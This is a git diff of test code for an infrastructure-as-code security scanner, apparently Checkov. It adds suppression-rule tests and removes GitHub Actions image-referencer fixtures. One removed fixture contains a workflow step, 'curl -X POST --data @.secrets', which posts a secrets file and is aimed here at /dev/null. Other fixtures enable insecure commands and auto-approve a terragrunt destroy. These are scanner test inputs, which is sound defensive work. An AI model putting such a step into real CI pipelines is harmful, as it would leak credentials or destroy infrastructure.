self.assertTrue(suppressions_integration._check_suppression_v2(record1, suppression)) + self.assertTrue(suppressions_integration._check_suppression_v2(record2, suppression)) + self.assertFalse(suppressions_integration._check_suppression_v2(record3, suppression)) + + instance.repo_id = 'another/repo' + self.assertFalse(suppressions_integration._check_suppression_v2(record1, suppression)) + def test_account_suppression_cli_repo(self): instance = BcPlatformIntegration() instance.repo_id = 'org/repo' @@ -845,6 +915,45 @@ def test_account_suppression_cli_repo(self): self.assertTrue(suppressions_integration._check_suppression(record1, suppression)) self.assertFalse(suppressions_integration._check_suppression(record2, suppression)) + def test_repo_v2_suppression_cli_repo(self): + instance = BcPlatformIntegration() + instance.repo_id = 'org/repo' + suppressions_integration = SuppressionsIntegration(instance) + suppressions_integration._init_repo_regex() + suppression = { + "ruleType": "repository", + "repositories": [ + {"repositoryName": "1234_org/repo"}, + {"repositoryName": "1234_not/valid"} + ], + "checkovPolicyIds": ["CKV_AWS_18", "CKV_AWS_19"], + } + + # this is actually almost the same as a policy check, except we care about the repo name in the integration + # record details do not matter, except policy ID + record1 = Record(check_id='CKV_AWS_18', check_name=None, check_result=None, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + record2 = Record(check_id='CKV_AWS_19', check_name=None, check_result=None, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + record3 = Record(check_id='CKV_AWS_1', check_name=None, check_result=None, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + + self.assertTrue(suppressions_integration._check_suppression_v2(record1, suppression)) + self.assertTrue(suppressions_integration._check_suppression_v2(record2, suppression)) + self.assertFalse(suppressions_integration._check_suppression_v2(record3, suppression)) + + instance.repo_id = 'another/repo' + self.assertFalse(suppressions_integration._check_suppression_v2(record1, suppression)) + def test_resource_suppression(self): instance = BcPlatformIntegration() instance.repo_id = 'org/repo' @@ -1013,6 +1122,71 @@ def test_tag_suppression(self): self.assertFalse(suppressions_integration._check_suppression(record4, suppression)) self.assertFalse(suppressions_integration._check_suppression(record5, suppression)) + def test_file_v2_suppression_cli_repo(self): + instance = BcPlatformIntegration() + instance.repo_id = 'org/repo' + suppressions_integration = SuppressionsIntegration(instance) + suppressions_integration._init_repo_regex() + suppression = { + "ruleType": "file", + "files": [ + { + "repositoryName": "1234_org/repo", + "filePath": "test/file.txt" + }, + { + "repositoryName": "1234_org/repo2", + "filePath": "/test/file2.txt" + }, + { + "repositoryName": "1234_not/valid", + "filePath": "/test/file3.txt" + } + ], + "checkovPolicyIds": ["CKV_AWS_18", "CKV_AWS_19"], + } + + # this is actually almost the same as a policy check, except we care about the repo name in the integration + # record details do not matter, except policy ID + record1 = Record(check_id='CKV_AWS_18', check_name=None, check_result=None, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + record1.repo_file_path = '/test/file.txt' + record2 = Record(check_id='CKV_AWS_19', check_name=None, check_result=None, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + record2.repo_file_path = 'test/file.txt' # should still match despite missing slash + record3 = Record(check_id='CKV_AWS_18', check_name=None, check_result=None, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + record3.repo_file_path = '/test/file2.txt' + record4 = Record(check_id='CKV_AWS_1', check_name=None, check_result=None, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + record4.repo_file_path = 'test/file.txt' + + self.assertTrue(suppressions_integration._check_suppression_v2(record1, suppression)) + self.assertTrue(suppressions_integration._check_suppression_v2(record2, suppression)) + self.assertFalse(suppressions_integration._check_suppression_v2(record3, suppression)) # right file, wrong repo + self.assertFalse(suppressions_integration._check_suppression_v2(record4, suppression)) + + record1.repo_file_path = '/test/file2.txt' + record2.repo_file_path = 'test/file2.txt' + instance.repo_id = 'org/repo2' # now check the same thing but with a leading slash in the suppression file + self.assertTrue(suppressions_integration._check_suppression_v2(record1, suppression)) + self.assertTrue(suppressions_integration._check_suppression_v2(record2, suppression)) + + instance.repo_id = 'another/repo' + self.assertFalse(suppressions_integration._check_suppression_v2(record1, suppression)) + def test_apply_suppressions_to_report(self): instance = BcPlatformIntegration() @@ -1024,6 +1198,7 @@ def test_apply_suppressions_to_report(self): "policyId": "BC_AWS_GENERAL_31", "comment": "No justification comment provided.", "checkovPolicyId": "CKV_AWS_79", + "isV1": True } suppressions_integration.suppressions = {suppression['checkovPolicyId']: [suppression]} @@ -1065,44 +1240,126 @@ def test_apply_suppressions_to_report(self): self.assertEqual(len(report.passed_checks), 1) self.assertEqual(report.passed_checks[0].check_id, 'CKV_AWS_2') self.assertEqual(len(report.skipped_checks), 2) + self.assertEqual(report.skipped_checks[0].check_result['suppress_comment'], "No justification comment provided.") + + def test_apply_suppressions_to_report_with_v2(self): + instance = BcPlatformIntegration() + + suppressions_integration = SuppressionsIntegration(instance) + + suppression = { + "ruleType": "policy", + "checkovPolicyIds": ["CKV_AWS_79", "CKV_AWS_80"], + "isV1": False, + "justificationComment": "comment" + } + + suppressions_integration.suppressions_v2 = {id: [suppression] for id in suppression['checkovPolicyIds']} + + record1 = Record(check_id='CKV_AWS_79', check_name=None, + check_result={'result': CheckResult.FAILED, 'evaluated_keys': ['multi_az']}, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + record2 = Record(check_id='CKV_AWS_1', check_name=None, + check_result={'result': CheckResult.FAILED, 'evaluated_keys': ['multi_az']}, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + record3 = Record(check_id='CKV_AWS_80', check_name=None, + check_result={'result': CheckResult.PASSED, 'evaluated_keys': ['multi_az']}, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + record4 = Record(check_id='CKV_AWS_2', check_name=None, + check_result={'result': CheckResult.PASSED, 'evaluated_keys': ['multi_az']}, + code_block=None, file_path=None, + file_line_range=None, + resource=None, evaluations=None, + check_class=None, file_abs_path='.', entity_tags=None) + + report = Report('terraform') + report.add_record(record1) + report.add_record(record2) + report.add_record(record3) + report.add_record(record4) + + suppressions_integration._apply_suppressions_to_report(report) + self.assertEqual(len(report.failed_checks), 1) + self.assertEqual(report.failed_checks[0].check_id, 'CKV_AWS_1') + self.assertEqual(len(report.passed_checks), 1) + self.assertEqual(report.passed_checks[0].check_id, 'CKV_AWS_2') + self.assertEqual(len(report.skipped_checks), 2) + self.assertEqual(report.skipped_checks[0].check_result['suppress_comment'], "comment") def test_get_policy_level_suppressions(self): instance = BcPlatformIntegration() suppressions_integration = SuppressionsIntegration(instance) suppressions_integration.suppressions = { - 'CKV_AWS_252': [{'suppressionType': 'Policy', 'id': '404088ed-4251-41ac-8dc1-45264af0c461', + 'CKV_AWS_252': [{'suppressionType': 'Policy', "isV1": True, 'id': '404088ed-4251-41ac-8dc1-45264af0c461', 'policyId': 'BC_AWS_GENERAL_175', 'creationDate': '2022-11-09T16:27:36.413Z', 'comment': 'Test2', 'checkovPolicyId': 'CKV_AWS_252'}], 'CKV_AWS_36': [ - {'suppressionType': 'Policy', 'id': 'b68013bc-2908-4c9a-969d-f1640d4aca11', + {'suppressionType': 'Policy', "isV1": True, 'id': 'b68013bc-2908-4c9a-969d-f1640d4aca11', 'policyId': 'BC_AWS_LOGGING_2', 'creationDate': '2022-11-09T16:11:58.435Z', 'comment': 'Testing', 'checkovPolicyId': 'CKV_AWS_36'}], 'CKV_K8S_27': [ - {'suppressionType': 'Policy', 'id': '271c1a79-2333-4a12-bf7d-55ec78468b94', 'policyId': 'BC_K8S_26', + {'suppressionType': 'Policy', "isV1": True, 'id': '271c1a79-2333-4a12-bf7d-55ec78468b94', 'policyId': 'BC_K8S_26', 'creationDate': '2022-12-08T08:00:04.561Z', 'comment': 'test checkov suppressions', 'checkovPolicyId': 'CKV_K8S_27'}], 'acme_AWS_1668010000289': [ - {'suppressionType': 'Resources', 'id': '5565e523-58da-4bc7-970e-c3fceef93ac1', + {'suppressionType': 'Resources', "isV1": True, 'id': '5565e523-58da-4bc7-970e-c3fceef93ac1', 'policyId': 'acme_AWS_1668010000289', 'creationDate': '2022-11-09T16:28:50.887Z', 'comment': 'Testing', 'resources': [{'accountId': 'acme_cli_repo/testing-resources', 'resourceId': '/src/BC_AWS_LOGGING_7.tf:aws_cloudtrail.cloudtrail9'}], 'checkovPolicyId': 'acme_AWS_1668010000289'}, - {'suppressionType': 'Resources', 'id': 'adf6f831-4393-4dcb-b345-2a14bf944267', + {'suppressionType': 'Resources', "isV1": True, 'id': 'adf6f831-4393-4dcb-b345-2a14bf944267', 'policyId': 'acme_AWS_1668010000289', 'creationDate': '2022-11-09T16:28:50.951Z', 'comment': 'Testing', 'resources': [{'accountId': 'acme_cli_repo/testing-resources', 'resourceId': '/src/BC_AWS_LOGGING_7.tf:aws_cloudtrail.cloudtrail10'}], 'checkovPolicyId': 'acme_AWS_1668010000289'}, - {'suppressionType': 'Resources', 'id': '86d88e69-5755-4e69-965b-f97fc26e784b', + {'suppressionType': 'Resources', "isV1": True, 'id': '86d88e69-5755-4e69-965b-f97fc26e784b', 'policyId': 'acme_AWS_1668010000289', 'creationDate': '2022-11-09T16:28:50.838Z', 'comment': 'Testing', 'resources': [{'accountId': 'acme_cli_repo/testing-resources', 'resourceId': '/src/BC_AWS_LOGGING_7.tf:aws_cloudtrail.cloudtrail8'}], 'checkovPolicyId': 'acme_AWS_1668010000289'}]} + suppressions_integration.suppressions_v2 = { + "CKV3_SAST_1": [{ + "ruleType": "policy", + "isV1": False, + "id": "1111", + "policyIds": ["BC_SAST_1", "BC_SAST_2"] + }], + "CKV3_SAST_2": [ + { + "ruleType": "policy", + "isV1": False, + "id": "2222", + "policyIds": ["BC_SAST_3", "BC_SAST_2"] + }, + { + "ruleType": "repository", + "isV1": False, + "id": "3333", + "policyIds": ["BC_SAST_1", "BC_SAST_3"] + } + ] + } + expected_suppressions = ['404088ed-4251-41ac-8dc1-45264af0c461', 'b68013bc-2908-4c9a-969d-f1640d4aca11', - '271c1a79-2333-4a12-bf7d-55ec78468b94'] + '271c1a79-2333-4a12-bf7d-55ec78468b94', '1111', '2222'] policy_level_suppressions = suppressions_integration.get_policy_level_suppressions() self.assertEqual(expected_suppressions, list(policy_level_suppressions.keys())) + self.assertEqual(policy_level_suppressions['404088ed-4251-41ac-8dc1-45264af0c461'], ['BC_AWS_GENERAL_175']) + self.assertEqual(policy_level_suppressions['b68013bc-2908-4c9a-969d-f1640d4aca11'], ['BC_AWS_LOGGING_2']) + self.assertEqual(policy_level_suppressions['271c1a79-2333-4a12-bf7d-55ec78468b94'], ['BC_K8S_26']) + self.assertEqual(policy_level_suppressions['1111'], ["BC_SAST_1", "BC_SAST_2"]) + self.assertEqual(policy_level_suppressions['2222'], ["BC_SAST_3", "BC_SAST_2"]) if __name__ == '__main__': diff --git a/tests/common/output/test_sarif_report.py b/tests/common/output/test_sarif_report.py index c93698f3a87..a8e83e6917a 100644 --- a/tests/common/output/test_sarif_report.py +++ b/tests/common/output/test_sarif_report.py @@ -398,7 +398,7 @@ def test_non_url_guideline_link(self): def get_sarif_schema() -> dict[str, Any]: file_name, headers = urllib.request.urlretrieve( - "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/master/Documents/CommitteeSpecifications/2.1.0/sarif-schema-2.1.0.json" + "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json" ) with open(file_name, "r") as file: schema = json.load(file) diff --git a/tests/common/utils/test_type_forcers.py b/tests/common/utils/test_type_forcers.py index 7373d5a728b..8622417ba40 100644 --- a/tests/common/utils/test_type_forcers.py +++ b/tests/common/utils/test_type_forcers.py @@ -9,9 +9,14 @@ def test_convert_prisma_policy_filter_to_dict(self): self.assertDictEqual(convert_prisma_policy_filter_to_dict(''), {}) self.assertDictEqual(convert_prisma_policy_filter_to_dict(None), {}) self.assertDictEqual(convert_prisma_policy_filter_to_dict('F1 = A, F2= B '), {'F1': 'A', 'F2': 'B'}) - self.assertDictEqual(convert_prisma_policy_filter_to_dict('F1=A,B,F2=C'), {'F1': 'A'}) + self.assertDictEqual(convert_prisma_policy_filter_to_dict('F1=A,B,F2=C'), {'F1': 'A', 'F2': 'C'}) self.assertDictEqual(convert_prisma_policy_filter_to_dict('F1=A,F2=B,C'), {'F1': 'A', 'F2': 'B'}) + policy_string = 'policy.name=AWS S3 bucket ACL grants READ permission to everyone' + filter_string = convert_prisma_policy_filter_to_dict(policy_string) + self.assertDictEqual(filter_string, {'policy.name': 'AWS S3 bucket ACL grants READ permission to everyone'}) + + if __name__ == '__main__': unittest.main() diff --git a/tests/github_actions/image_referencer/__init__.py b/tests/github_actions/image_referencer/__init__.py deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/tests/github_actions/image_referencer/conftest.py b/tests/github_actions/image_referencer/conftest.py deleted file mode 100644 index 1357f974587..00000000000 --- a/tests/github_actions/image_referencer/conftest.py +++ /dev/null @@ -1,522 +0,0 @@ -from __future__ import annotations -from typing import Any - -import pytest - - -@pytest.fixture -def workflow_with_images() -> dict[str, Any]: - return { - "name": "Name", - "on": { - "workflow_dispatch": { - "inputs": { - "logLevel": { - "description": "Log level", - "__startline__": 6, - "__endline__": 8 - }, - "__startline__": 5, - "__endline__": 8 - }, - "__startline__": 4, - "__endline__": 8 - }, - "__startline__": 3, - "__endline__": 8 - }, - "jobs": { - "destroy_cert": { - "runs-on": "ubuntu-latest", - "name": "Name", - "container": "node:14.16", - "steps": [ - { - "name": "Checkout codebase", - "uses": "actions/checkout@v3", - "__startline__": 14, - "__endline__": 16 - }, - { - "name": "infrastructure", - "working-directory": "terraform", - "shell": "bash", - "env": { - "TF_INPUT": 0, - "__startline__": 20, - "__endline__": 21 - }, - "run": "terragrunt init\nterragrunt destroy -auto-approve -var-file devl.tfvars\n", - "__startline__": 16, - "__endline__": 24 - } - ], - "__startline__": 10, - "__endline__": 24 - }, - "__startline__": 9, - "__endline__": 24 - }, - "__startline__": 1, - "__endline__": 24 - } - - -@pytest.fixture -def workflow_line_numbers_with_image() -> list[tuple[int, str]]: - return [(1, 'name: Name\n'), - (2, 'on:\n'), - (3, ' workflow_dispatch:\n'), - (4, ' inputs:\n'), - (5, ' logLevel:\n'), - (6, " description: 'Log level'\n"), - (7, '\n'), - (8, 'jobs:\n'), - (9, ' destroy_cert:\n'), - (10, ' runs-on: ubuntu-latest\n'), - (11, ' name: Name\n'), - (12, ' container: node:14.16\n'), - (13, ' steps:\n'), - (14, ' - name: Checkout codebase\n'), - (15, ' uses: actions/checkout@v3\n'), - (16, ' - name: infrastructure\n'), - (17, ' working-directory: terraform\n'), - (18, ' shell: bash\n'), - (19, ' env:\n'), - (20, ' TF_INPUT: 0\n'), - (21, ' run: |\n'), - (22, ' terragrunt init\n'), - (23, ' terragrunt destroy -auto-approve -var-file devl.tfvars\n')] - - -@pytest.fixture -def workflow_without_images() -> dict[str, Any]: - return { - "on": "pull_request", - "name": "unsecure-worfklow", - "jobs": { - "unsecure-job": { - "name": "job2", - "runs-on": "ubuntu-latest", - "env": { - "ACTIONS_ALLOW_UNSECURE_COMMANDS": True, - "__startline__": 10, - "__endline__": 11 - }, - "steps": [ - { - "name": "unsecure-step2", - "run": "echo \"goo\"\n", - "__startline__": 12, - "__endline__": 15 - } - ], - "__startline__": 7, - "__endline__": 15 - }, - "secure-job": { - "name": "job3", - "runs-on": "ubuntu-latest", - "env": { - "ACTIONS_ALLOW_UNSECURE_COMMANDS": False, - "__startline__": 19, - "__endline__": 20 - }, - "run": "echo \"ok\"", - "__startline__": 16, - "__endline__": 21 - }, - "__startline__": 6, - "__endline__": 21 - }, - "__startline__": 1, - "__endline__": 21 - } - - -@pytest.fixture -def workflow_line_numbers_with_image_first() -> list[tuple[int, str]]: - return [(1, 'name: Name\n'), - (2, 'on:\n'), - (3, ' workflow_dispatch:\n'), - (4, ' inputs:\n'), - (5, ' logLevel:\n'), - (6, " description: 'Log level'\n"), - (7, '\n'), - (8, 'jobs:\n'), - (9, ' first_job:\n'), - (10, ' container: node:14.22\n'), - (11, ' name: Name\n'), - (12, ' book: wood\n'), - (13, ' steps:\n'), - (14, ' - name: Checkout codebase\n'), - (15, ' uses: actions/checkout@v3\n'), - (16, ' - name: infrastructure\n'), - (17, ' working-directory: terraform\n'), - (18, ' shell: bash\n'), - (19, ' env:\n'), - (20, ' TF_INPUT: 0\n'), - (21, ' run: |\n'), - (22, ' terragrunt init\n'), - (23, ' terragrunt destroy -auto-approve -var-file devl.tfvars\n'), - (24, ' second_job:\n'), - (25, ' runs-on: ubuntu-latest\n'), - (26, ' name: Name\n'), - (27, ' container: node:14.16\n'), - (28, ' steps:\n'), - (29, ' - name: Checkout codebase\n'), - (30, ' uses: actions/checkout@v3\n'), - (31, ' - name: infrastructure\n'), - (32, ' working-directory: terraform\n'), - (33, ' shell: bash\n'), - (34, ' env:\n'), - (35, ' TF_INPUT: 0\n'), - (36, ' run: |\n'), - (37, ' terragrunt init\n'), - (38, ' terragrunt destroy -auto-approve -var-file devl.tfvars\n') - ] - - -@pytest.fixture -def workflow_line_numbers_with_two_identical_images() -> list[tuple[int, str]]: - return [(1, 'name: Name\n'), - (2, 'on:\n'), - (3, ' workflow_dispatch:\n'), - (4, ' inputs:\n'), - (5, ' logLevel:\n'), - (6, " description: 'Log level'\n"), - (7, '\n'), - (8, 'jobs:\n'), - (9, ' first_job:\n'), - (10, ' runs-on: ubuntu-latest\n'), - (11, ' name: Name\n'), - (12, ' container: node:14.16\n'), - (13, ' steps:\n'), - (14, ' - name: Checkout codebase\n'), - (15, ' uses: actions/checkout@v3\n'), - (16, ' - name: infrastructure\n'), - (17, ' working-directory: terraform\n'), - (18, ' shell: bash\n'), - (19, ' env:\n'), - (20, ' TF_INPUT: 0\n'), - (21, ' run: |\n'), - (22, ' terragrunt init\n'), - (23, ' terragrunt destroy -auto-approve -var-file devl.tfvars\n'), - (24, ' second_job:\n'), - (25, ' runs-on: ubuntu-latest\n'), - (26, ' name: Name\n'), - (27, ' container: node:14.16\n'), - (28, ' steps:\n'), - (29, ' - name: Checkout codebase\n'), - (30, ' uses: actions/checkout@v3\n'), - (31, ' - name: infrastructure\n'), - (32, ' working-directory: terraform\n'), - (33, ' shell: bash\n'), - (34, ' env:\n'), - (35, ' TF_INPUT: 0\n'), - (36, ' run: |\n'), - (37, ' terragrunt init\n'), - (38, ' terragrunt destroy -auto-approve -var-file devl.tfvars\n') - ] - - -@pytest.fixture -def workflow_with_image_first() -> dict[str, Any]: - return { - "name": "Name", - "on": { - "workflow_dispatch": { - "inputs": { - "logLevel": { - "description": "Log level", - "__startline__": 6, - "__endline__": 8 - }, - "__startline__": 5, - "__endline__": 8 - }, - "__startline__": 4, - "__endline__": 8 - }, - "__startline__": 3, - "__endline__": 8 - }, - "jobs": { - "first_job": { - "runs-on": "ubuntu-latest", - "name": "Name", - "container": "node:14.22", - "steps": [ - { - "name": "Checkout codebase", - "uses": "actions/checkout@v3", - "__startline__": 14, - "__endline__": 16 - }, - { - "name": "infrastructure", - "working-directory": "terraform", - "shell": "bash", - "env": { - "TF_INPUT": 0, - "__startline__": 20, - "__endline__": 21 - }, - "run": "terragrunt init\nterragrunt destroy -auto-approve -var-file devl.tfvars\n", - "__startline__": 16, - "__endline__": 24 - } - ], - "__startline__": 10, - "__endline__": 24 - }, - "second_job": { - "runs-on": "ubuntu-latest", - "name": "Name", - "container": "node:14.16", - "steps": [ - { - "name": "Checkout codebase", - "uses": "actions/checkout@v3", - "__startline__": 29, - "__endline__": 31 - }, - { - "name": "infrastructure", - "working-directory": "terraform", - "shell": "bash", - "env": { - "TF_INPUT": 0, - "__startline__": 35, - "__endline__": 36 - }, - "run": "terragrunt init\nterragrunt destroy -auto-approve -var-file devl.tfvars\n", - "__startline__": 31, - "__endline__": 39 - } - ], - "__startline__": 25, - "__endline__": 39 - }, - "__startline__": 24, - "__endline__": 39 - }, - "__startline__": 1, - "__endline__": 39 - } - - -@pytest.fixture -def workflow_with_two_identical_images() -> dict[str, Any]: - return { - "name": "Name", - "on": { - "workflow_dispatch": { - "inputs": { - "logLevel": { - "description": "Log level", - "__startline__": 6, - "__endline__": 8 - }, - "__startline__": 5, - "__endline__": 8 - }, - "__startline__": 4, - "__endline__": 8 - }, - "__startline__": 3, - "__endline__": 8 - }, - "jobs": { - "first_job": { - "runs-on": "ubuntu-latest", - "name": "Name", - "container": "node:14.16", - "steps": [ - { - "name": "Checkout codebase", - "uses": "actions/checkout@v3", - "__startline__": 14, - "__endline__": 16 - }, - { - "name": "infrastructure", - "working-directory": "terraform", - "shell": "bash", - "env": { - "TF_INPUT": 0, - "__startline__": 20, - "__endline__": 21 - }, - "run": "terragrunt init\nterragrunt destroy -auto-approve -var-file devl.tfvars\n", - "__startline__": 16, - "__endline__": 24 - } - ], - "__startline__": 10, - "__endline__": 24 - }, - "second_job": { - "runs-on": "ubuntu-latest", - "name": "Name", - "container": "node:14.16", - "steps": [ - { - "name": "Checkout codebase", - "uses": "actions/checkout@v3", - "__startline__": 29, - "__endline__": 31 - }, - { - "name": "infrastructure", - "working-directory": "terraform", - "shell": "bash", - "env": { - "TF_INPUT": 0, - "__startline__": 35, - "__endline__": 36 - }, - "run": "terragrunt init\nterragrunt destroy -auto-approve -var-file devl.tfvars\n", - "__startline__": 31, - "__endline__": 39 - } - ], - "__startline__": 25, - "__endline__": 39 - }, - "__startline__": 24, - "__endline__": 39 - }, - "__startline__": 1, - "__endline__": 39 - } - - -@pytest.fixture -def workflow_line_numbers_without_image() -> list[tuple[int, str]]: - return [(1, 'on: pull_request\n'), - (2, '\n'), - (3, 'name: unsecure-worfklow\n'), - (4, '\n'), - (5, 'jobs:\n'), - (6, ' unsecure-job:\n'), - (7, ' name: job2\n'), - (8, ' runs-on: ubuntu-latest\n'), - (9, ' env:\n'), - (10, ' ACTIONS_ALLOW_UNSECURE_COMMANDS: true\n'), - (11, ' steps:\n'), - (12, ' - name: unsecure-step2\n'), - (13, ' run: |\n'), - (14, ' echo "goo"\n'), - (15, ' secure-job:\n'), - (16, ' name: job3\n'), - (17, ' runs-on: ubuntu-latest\n'), - (18, ' env:\n'), - (19, ' ACTIONS_ALLOW_UNSECURE_COMMANDS: false\n'), - (20, ' run: |\n'), - (21, ' echo "ok"')] - - -@pytest.fixture -def image_cached_result() -> dict[str, Any]: - return { - "results": [ - { - "id": "sha256:f9b91f78b0344fa0efc5583d79e78a90556ab0bb3f93fcbc8728b0b70d29a5db", - "name": "python:3.9-alpine", - "distro": "Alpine Linux v3.16", - "distroRelease": "3.16.1", - "digest": "sha256:83a343afa488ff14d0c807b62770140d2ec30ef2e83a3a45c4ce62c29623e240", - "collections": ["All"], - "packages": [{"type": "os", "name": "zlib", "version": "1.2.12-r1", "licenses": ["Zlib"]}], - "compliances": [], - "complianceDistribution": {"critical": 0, "high": 0, "medium": 0, "low": 0, "total": 0}, - "complianceScanPassed": True, - "vulnerabilities": [ - { - "id": "CVE-2022-37434", - "status": "fixed in 1.2.12-r2", - "description": "zlib through 1.2.12 has a heap-based buffer over-read ...", - "severity": "low", - "packageName": "zlib", - "packageVersion": "1.2.12-r1", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", - "riskFactors": ["Has fix", "Recent vulnerability"], - "impactedVersions": ["<1.2.12-r2"], - "publishedDate": "2022-08-05T07:15:00Z", - "discoveredDate": "2022-08-08T13:45:43Z", - "fixDate": "2022-08-05T07:15:00Z", - } - ], - "vulnerabilityDistribution": {"critical": 0, "high": 0, "medium": 0, "low": 1, "total": 1}, - "vulnerabilityScanPassed": True, - } - ] - } - - -@pytest.fixture -def definition() -> dict[str, Any]: - return { - "name": "CI", - "on": { - "push": { - "branches": [ - "main" - ], - "__startline__": 4, - "__endline__": 5 - }, - "__startline__": 3, - "__endline__": 5 - }, - "jobs": { - "container-test-job": { - "runs-on": "ubuntu-latest", - "container": { - "image": "node:14.16", - "env": { - "NODE_ENV": "development", - "__startline__": 11, - "__endline__": 12 - }, - "ports": [ - 80 - ], - "volumes": [ - "my_docker_volume:/volume_mount" - ], - "options": "--cpus 1", - "__startline__": 9, - "__endline__": 17 - }, - "steps": [ - { - "name": "Check for dockerenv file", - "run": "(ls /.dockerenv && echo Found dockerenv) || (echo No dockerenv)\ncurl -X POST -s --data \"@.secrets\" /dev/null\n", - "__startline__": 18, - "__endline__": 23 - } - ], - "__startline__": 7, - "__endline__": 23 - }, - "second_job": { - "runs-on": "ubuntu-latest", - "steps": [ - { - "name": "Check for dockerenv file", - "run": "(ls /.dockerenv && echo Found dockerenv) || (echo No dockerenv)\ncurl -X POST -s --data \"@.secrets\" /dev/null\n", - "__startline__": 26, - "__endline__": 30 - } - ], - "__startline__": 24, - "__endline__": 30 - }, - "__startline__": 6, - "__endline__": 30 - }, - "__startline__": 1, - "__endline__": 30 - } \ No newline at end of file diff --git a/tests/github_actions/image_referencer/test_github_action_provider.py b/tests/github_actions/image_referencer/test_github_action_provider.py deleted file mode 100644 index 5c5f64f6aa6..00000000000 --- a/tests/github_actions/image_referencer/test_github_action_provider.py +++ /dev/null @@ -1,95 +0,0 @@ -import pytest - -from checkov.common.images.image_referencer import Image -from checkov.github_actions.image_referencer.provider import GithubActionProvider -from checkov.github_actions.runner import Runner - -def test_extract_images_from_workflow(workflow_with_images, workflow_line_numbers_with_image): - file_path = '/.github/workflows/workflow_with_string_container.yml' - - gha_provider = GithubActionProvider(file_path=file_path, workflow_config=workflow_with_images, - workflow_line_numbers=workflow_line_numbers_with_image) - images = gha_provider.extract_images_from_workflow() - - assert images == [ - Image( - end_line=13, - start_line=12, - name='node:14.16', - file_path=file_path, - related_resource_id='jobs(destroy_cert)' - ) - ] - - -def test_extract_images_from_workflow_no_images(workflow_without_images, workflow_line_numbers_without_image): - file_path = '/.github/workflows/unsecure_command.yaml' - - gha_provider = GithubActionProvider(file_path=file_path, workflow_config=workflow_without_images, - workflow_line_numbers=workflow_line_numbers_without_image) - images = gha_provider.extract_images_from_workflow() - - assert not images - - -def test_extract_images_from_workflow_with_first_image(workflow_with_image_first, workflow_line_numbers_with_image_first): - file_path = '/.github/workflows/command.yaml' - - gha_provider = GithubActionProvider(file_path=file_path, workflow_config=workflow_with_image_first, - workflow_line_numbers=workflow_line_numbers_with_image_first) - images = gha_provider.extract_images_from_workflow() - - assert len(images) == 2 - assert images[0].start_line != images[1].start_line - assert images[0].end_line != images[1].end_line - assert images[0].related_resource_id != images[1].related_resource_id - - -def test_extract_images_from_workflow_correct_line_numbers(workflow_with_two_identical_images, - workflow_line_numbers_with_two_identical_images): - file_path = '/.github/workflows/unsecure_command.yaml' - - gha_provider = GithubActionProvider(file_path=file_path, workflow_config=workflow_with_two_identical_images, - workflow_line_numbers=workflow_line_numbers_with_two_identical_images) - images = gha_provider.extract_images_from_workflow() - - assert len(images) == 2 - assert images[0].start_line != images[1].start_line - assert images[0].end_line != images[1].end_line - assert images[0].related_resource_id != images[1].related_resource_id - - -@pytest.mark.parametrize( - "start_line,end_line,expected_key", - [ - (9, 17, "jobs(container-test-job)"), - (24, 30, "jobs(second_job)"), - (35, 40, "") - ], -) -def test_generate_resource_key(start_line, end_line, expected_key, definition): - gha_provider = GithubActionProvider(definition, '', []) - - key = gha_provider.generate_resource_key(start_line, end_line) - - assert key == expected_key - - -@pytest.mark.parametrize( - "start_line, end_line, supported_entities, old_key_format, expected_key", - [ - (9, 17, ('jobs', 'jobs.*.steps[]'), 'jobs.container-test-job.CKV_GHA_3[7:23]', "jobs(container-test-job)"), - (24, 30, ('jobs', 'jobs.*.steps[]'), "jobs.second_job.CKV_GHA_3[24:30]", "jobs(second_job)") - ], -) -def test_generate_resource_key_generates_same_key_as_get_resource(start_line, end_line, supported_entities, - old_key_format, expected_key, definition): - gha_provider = GithubActionProvider(definition, '', []) - runner = Runner() - file_path = "mock_path" - runner.definitions[file_path] = definition - - key1 = runner.get_resource(file_path, old_key_format, supported_entities, start_line, end_line) - key2 = gha_provider.generate_resource_key(start_line, end_line) - - assert key1 == key2 == expected_key diff --git a/tests/github_actions/image_referencer/test_manager.py b/tests/github_actions/image_referencer/test_manager.py deleted file mode 100644 index 5c8a8350864..00000000000 --- a/tests/github_actions/image_referencer/test_manager.py +++ /dev/null @@ -1,30 +0,0 @@ -from checkov.common.images.image_referencer import Image -from checkov.github_actions.image_referencer.manager import GithubActionsImageReferencerManager - - -def test_extract_images_from_workflow(workflow_with_images, workflow_line_numbers_with_image): - file_path = '/.github/workflows/workflow_with_string_container.yml' - - manager = GithubActionsImageReferencerManager(file_path=file_path, workflow_config=workflow_with_images, - workflow_line_numbers=workflow_line_numbers_with_image) - images = manager.extract_images_from_workflow() - - assert images == [ - Image( - end_line=13, - start_line=12, - name='node:14.16', - file_path=file_path, - related_resource_id='jobs(destroy_cert)' - ) - ] - - -def test_extract_images_from_workflow_no_images(workflow_without_images, workflow_line_numbers_without_image): - file_path = '/.github/workflows/unsecure_command.yaml' - - manager = GithubActionsImageReferencerManager(file_path=file_path, workflow_config=workflow_without_images, - workflow_line_numbers=workflow_line_numbers_without_image) - images = manager.extract_images_from_workflow() - - assert not images diff --git a/tests/github_actions/image_referencer/test_runner.py b/tests/github_actions/image_referencer/test_runner.py deleted file mode 100644 index d14473b37a0..00000000000 